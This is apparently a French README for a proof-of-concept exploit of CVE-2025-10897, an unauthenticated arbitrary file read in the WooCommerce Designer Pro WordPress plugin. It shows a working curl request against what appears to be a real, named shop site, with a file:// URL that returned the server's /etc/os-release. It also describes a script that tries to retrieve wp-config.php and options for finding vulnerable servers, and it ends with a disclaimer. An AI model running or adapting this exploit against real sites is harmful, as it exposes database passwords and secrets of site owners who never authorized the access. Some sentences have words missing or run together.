
WooCommerce Designer Pro <= 1.9.28 - Lecture de fichier arbitraire non authentifiée
WooCommerce est un plugin de commerce électronique open source pour WordPress qui transforme les sites web en boutiques en ligne. WooCommerce Designer Pro est un plugin WordPress développé par JMA Plugins qui permet aux clients de concevoir et de personnaliser des produits directement sur les boutiques WooCommerce.
IMPORTANT : WooCommerce et WooCommerce Designer Pro sont complètement différents.
WooCommerce Designer Pro permet de créer des cartes de visite, des cartes postales, des dépliants, affiches, t-shirts, autocollants et autres supports imprimables, avec des fonctionnalités telles que la prise en charge du CMJN, la génération de PDF et une interface de conception sur canevas. Le plugin s'intègre à WooCommerce pour permettre la personnalisation en temps réel des produits avant l'achat, ce qui le rend adapté aux entreprises d'impression en ligne et aux boutiques de produits personnalisés.
CVE-2025-10897 est une lecture arbitraire de fichiers sans authentification dans WooCommerce Designer Pro jusqu'à la version (CWE-22). Un attaquant envoie avec et une URL pointant vers des fichiers du serveur tels que ou . Le plugin renvoie le contenu du fichier dans la réponse JSON. Cela peut divulguer les mots de passe de la base de données et d'autres secrets de sans aucun compte WordPress.
1.9.28POST /wp-admin/admin-ajax.phpaction=wcdp_convert_resource_cmykfile:///etc/passwdwp-config.phpwp-config.phpREQUÊTE
curl -sk -X POST 'https://www.procolorprints.ca/wp-admin/admin-ajax.php' \
-H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept: */*' \
-H 'Connection: close' \
-d 'action=wcdp_convert_resource_cmyk&url=file:///etc/os-release'
RÉPONSE
{"string":"data:image\/jpg;base64,TkFNRT0iQWxtYUxpbnV4IgpWRVJTSU9OPSI5LjggKE9saXZlIEphZ3VhcikiCklEPSJhbG1hbGludXgiCklEX0xJS0U9InJoZWwgY2VudG9zIGZlZG9yYSIKVkVSU0lPTl9JRD0iOS44IgpQTEFURk9STV9JRD0icGxhdGZvcm06ZWw5IgpQUkVUVFlfTkFNRT0iQWxtYUxpbnV4IDkuOCAoT2xpdmUgSmFndWFyKSIKQU5TSV9DT0xPUj0iMDszNCIKTE9HTz0iZmVkb3JhLWxvZ28taWNvbiIKQ1BFX05BTUU9ImNwZTovbzphbG1hbGludXg6YWxtYWxpbnV4Ojk6OmJhc2VvcyIKSE9NRV9VUkw9Imh0dHBzOi8vYWxtYWxpbnV4Lm9yZy8iCkRPQ1VNRU5UQVRJT05fVVJMPSJodHRwczovL3dpa2kuYWxtYWxpbnV4Lm9yZy8iCkJVR19SRVBPUlRfVVJMPSJodHRwczovL2J1Z3MuYWxtYWxpbnV4Lm9yZy8iCgpBTE1BTElOVVhfTUFOVElTQlRfUFJPSkVDVD0iQWxtYUxpbnV4LTkiCkFMTUFMSU5VWF9NQU5USVNCVF9QUk9KRUNUX1ZFUlNJT049IjkuOCIKUkVESEFUX1NVUFBPUlRfUFJPRFVDVD0iQWxtYUxpbnV4IgpSRURIQVRfU1VQUE9SVEVfUFJPRFVDVF9WRVJTSU9OPSI5LjgiClNVUFBPUlRfRU5EPTIwMzItMDYtMDEK","success":true}
Réponse décodée en Base64 :
NAME="AlmaLinux"
VERSION="9.8 (Olive Jaguar)"
ID="almalinux"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.8"
PLATFORM_ID="platform:el9"
PRETTY_NAME="AlmaLinux 9.8 (Olive Jaguar)"
ANSI_COLOR="0;34"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:almalinux:almalinux:9::baseos"
HOME_URL="https://almalinux.org/"
DOCUMENTATION_URL="https://wiki.almalinux.org/"
BUG_REPORT_URL="https://bugs.almalinux.org/"
ALMALINUX_MANTISBT_PROJECT="AlmaLinux-9"
ALMALINUX_MANTISBT_PROJECT_VERSION="9.8"
REDHAT_SUPPORT_PRODUCT="AlmaLinux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.8"
SUPPORT_END=2032-06-01
python CVE-2025-10897-X7.py
REMARQUE : Notre script PoC essaie de récupérer wp-config.php, mais la cible peut avoir installé WordPress ailleurs que dans /var/www.
Arguments pour rechercher les serveurs vulnérables
Ce dépôt et son contenu sont fournis strictement pour la recherche en sécurité légitime, les tests d'intrusion autorisés, l'étude pédagogique et les finalités défensives. En accédant à ce matériel ou en l'utilisant, vous reconnaissez l'entière responsabilité de veiller à ce que vos activités soient conformes à toutes les lois applicables et que vous ayez obtenu une autorisation appropriée avant de tester ou d'appliquer ces techniques sur tout système que vous ne possédez pas.
Les auteurs et mainteneurs de ce projet déclinent toute responsabilité en cas de dommages, conséquences juridiques ou mauvais usage résultant de l'application de ces informations. Toute utilisation à des fins d'accès non autorisé, d'activité malveillante ou illégale est expressément interdite et non prise en charge.
Utilisez de manière responsable. Restez dans la légalité. Testez uniquement ce que vous possédez ou pour quoi vous avez une autorisation écrite explicite.
SCT-PL